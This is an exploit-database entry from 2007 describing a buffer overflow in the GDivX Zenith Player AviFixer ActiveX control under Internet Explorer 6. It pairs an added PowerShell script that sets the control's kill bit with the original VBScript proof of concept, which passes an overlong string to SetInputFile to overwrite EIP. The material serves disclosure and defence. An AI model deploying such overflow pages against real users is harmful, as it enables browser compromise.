vendor:
by: rgod
CVSS: 7.5 (HIGH)
CWE: Buffer Overflow
Product Name:
Affected Version From: Internet Explorer 6
Affected Version To: Internet Explorer 6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2007

IE 6 / GDivX Zenith Player AviFixer Class Buffer Overflow

This proof of concept demonstrates a buffer overflow in the GDivX Zenith Player AviFixer Class ActiveX control (fix.dll v. 1.0.0.1) when it is loaded in Internet Explorer 6. The page instantiates the control by CLSID and passes an overlong string to its SetInputFile method: 264 'A' characters, then the four bytes 'BBBB' that end up in the EIP register, then 9999 bytes of 0x90 padding. It was tested on Windows XP SP2.

Mitigation:

Apply the latest security patches and updates for Internet Explorer. Avoid visiting untrusted websites or downloading files from untrusted sources.
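
The metadata above lists no patch for this control (Patch Exists: NO), so a mitigation that does not depend on a vendor fix is to set Internet Explorer's kill bit for the CLSID the PoC instantiates. The PowerShell below is an added example, not part of the original advisory or PoC; it assumes Windows PowerShell 3.0 or later in an elevated session, and the function name Set-ActiveXKillBit is hypothetical.

```powershell
# Added example, not from the original advisory. Run in an elevated session.
# The CLSID is the one in the PoC's <object classid=...> tag.
$Clsid   = '{2225E9BC-AFB3-4ED4-B20E-4F6CF1C39F8B}'
$KillBit = 0x00000400   # "Compatibility Flags" bit: IE refuses to instantiate the control

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so both are covered.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# Hypothetical helper name; sets the kill bit under one registry view.
function Set-ActiveXKillBit {
    param(
        [Parameter(Mandatory = $true)][string]$Root,
        [Parameter(Mandatory = $true)][string]$Clsid
    )

    # Skip registry views that do not exist on this system (e.g. 32-bit Windows).
    if (-not (Test-Path -Path $Root)) { return }

    $key = Join-Path -Path $Root -ChildPath $Clsid
    if (-not (Test-Path -Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Keep any flags already present and OR in the kill bit.
    $name    = 'Compatibility Flags'
    $item    = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
    $current = if ($item) { [int]$item.$name } else { 0 }
    $new     = $current -bor $KillBit
    New-ItemProperty -Path $key -Name $name -PropertyType DWord -Value $new -Force | Out-Null

    # Read the value back so the result reflects what is actually stored.
    $stored = [int](Get-ItemProperty -Path $key -Name $name).$name
    [pscustomobject]@{
        Key     = $key
        Flags   = '0x{0:X8}' -f $stored
        Blocked = (($stored -band $KillBit) -ne 0)
    }
}

$Roots | ForEach-Object { Set-ActiveXKillBit -Root $_ -Clsid $Clsid } | Format-Table -AutoSize
```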
Source

Exploit-DB raw data:

<html>
 <object classid='clsid:2225E9BC-AFB3-4ED4-B20E-4F6CF1C39F8B' id='target'></object>
  <script language = 'vbscript'>
   ' IE 6 / GDivX Zenith Player AviFixer Class (fix.dll v. 1.0.0.1) buffer overflow POC by rgod
   ' tested on xp sp2
   EIP= "BBBB"
   BOF=String(264, "A") + EIP + String(9999, unescape("%90"))
   target.SetInputFile BOF
 </script>
</html>

# milw0rm.com [2007-05-09]